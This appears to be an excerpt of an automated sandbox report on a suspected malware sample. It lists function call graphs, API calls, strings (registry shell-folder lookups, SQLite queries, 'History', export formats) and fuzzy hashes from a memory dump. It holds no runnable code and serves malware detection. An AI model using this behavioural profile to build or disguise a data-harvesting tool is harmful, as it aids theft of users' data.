                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                • <%s>, xrefs: 004100A6
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf
                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                • API String ID: 3473751417-2880344631
                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscat$_snwprintfmemset
                                • String ID: %2.2X
                                • API String ID: 2521778956-791839006
                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintfwcscpy
                                • String ID: dialog_%d$general$menu_%d$strings
                                • API String ID: 999028693-502967061
                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memsetstrlen
                                • String ID:
                                • API String ID: 2350177629-0
                                • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                • API String ID: 2221118986-1606337402
                                • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmpmemset$_mbscpymemcpystrlen
                                • String ID:
                                • API String ID: 265355444-0
                                • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                  • Part of subcall function 0040A9CE: ??3@YAXPAX@Z.MSVCRT ref: 0040A9DD
                                • memset.MSVCRT ref: 0040C439
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                • _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                  • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                • memset.MSVCRT ref: 0040C4D0
                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                • String ID:
                                • API String ID: 1973883786-0
                                • Opcode ID: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                • Opcode Fuzzy Hash: 43de9e52db830488c7ebdb2928a6c49d702693ce72869a855233a6d80c0cc9be
                                • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                APIs
                                • memset.MSVCRT ref: 004116FF
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                  • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                  • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                  • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                • API String ID: 2618321458-3614832568
                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                APIs
                                • memset.MSVCRT ref: 004185FC
                                • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@AttributesFilememset
                                • String ID:
                                • API String ID: 776155459-0
                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                • malloc.MSVCRT ref: 00417524
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                • String ID:
                                • API String ID: 2308052813-0
                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                APIs
                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PathTemp$??3@
                                • String ID: %s\etilqs_$etilqs_
                                • API String ID: 1589464350-1420421710
                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                APIs
                                • memset.MSVCRT ref: 0040FDD5
                                  • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 0040FE1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                • String ID: <%s>%s</%s>$</item>$<item>
                                • API String ID: 1775345501-2769808009
                                • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                APIs
                                • wcscpy.MSVCRT ref: 0041477F
                                • wcscpy.MSVCRT ref: 0041479A
                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscpy$CloseCreateFileHandle
                                • String ID: General
                                • API String ID: 999786162-26480598
                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ErrorLastMessage_snwprintf
                                • String ID: Error$Error %d: %s
                                • API String ID: 313946961-1552265934
                                • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID:
                                • String ID: foreign key constraint failed$new$oid$old
                                • API String ID: 0-1953309616
                                • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                APIs
                                Strings
                                • unknown column "%s" in foreign key definition, xrefs: 00431858
                                • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                • API String ID: 3510742995-272990098
                                • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: gj
                                • API String ID: 1297977491-4203073231
                                • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                APIs
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                  • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                APIs
                                • AreFileApisANSI.KERNEL32 ref: 00417497
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                • malloc.MSVCRT ref: 004174BD
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                • String ID:
                                • API String ID: 2903831945-0
                                • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                APIs
                                • GetParent.USER32(?), ref: 0040D453
                                • GetWindowRect.USER32(?,?), ref: 0040D460
                                • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Rect$ClientParentPoints
                                • String ID:
                                • API String ID: 4247780290-0
                                • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                APIs
                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                • memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                  • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                • String ID:
                                • API String ID: 1471605966-0
                                • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                APIs
                                • wcscpy.MSVCRT ref: 0044475F
                                • wcscat.MSVCRT ref: 0044476E
                                • wcscat.MSVCRT ref: 0044477F
                                • wcscat.MSVCRT ref: 0044478E
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                • String ID: \StringFileInfo\
                                • API String ID: 102104167-2245444037
                                • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$??3@
                                • String ID: g4@
                                • API String ID: 3314356048-2133833424
                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _memicmpwcslen
                                • String ID: @@@@$History
                                • API String ID: 1872909662-685208920
                                • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                APIs
                                • memset.MSVCRT ref: 004100FB
                                • memset.MSVCRT ref: 00410112
                                  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                • _snwprintf.MSVCRT ref: 00410141
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$_snwprintf_wcslwrwcscpy
                                • String ID: </%s>
                                • API String ID: 3400436232-259020660
                                • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
